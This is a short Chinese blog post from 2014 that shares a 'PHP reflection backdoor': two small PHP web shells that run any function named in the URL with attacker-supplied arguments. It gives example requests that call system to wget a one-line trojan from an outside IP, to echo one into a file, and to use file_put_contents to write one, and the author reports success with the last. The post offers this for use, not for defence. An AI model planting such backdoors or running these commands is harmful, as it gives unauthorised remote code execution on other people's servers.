A-A+

PHP反射后门

2014年09月26日 16:56 学习笔记 暂无评论 阅读 359 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

PHP反射后门

PHP反射后门

1
2
3
4
<?php
    $func = new ReflectionFunction($_GET[m]);
    echo $func->invokeArgs(array($_GET[c]));
?>

这个可以应用在linux系统中。应用举例:
news.php?m=system&c=wget http://210.74.XX/igenus/images/suffix/test11.php //当前目录下载一句话马 for linux 个人表示没有试验过。下面的是应用在windows中的。
mu201405.php?m=system&c=echo ^ >test11.php //在当前目录下面生成一句话马 for windows 这个个人表示没成功,系统函数被禁止了。
换一个成功的吧。改动一下上面的代码如下:

1
2
3
4
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
?>

http://xx.xx//md.php?m=file_put_contents&c=test11.php&id= //写入一句话马 for linux
http://xx.xx//md.php?m=file_put_contents&c=test11.php&id= //写入一句话马 for windows
这个本人亲测成功~!~!

标签:

给我留言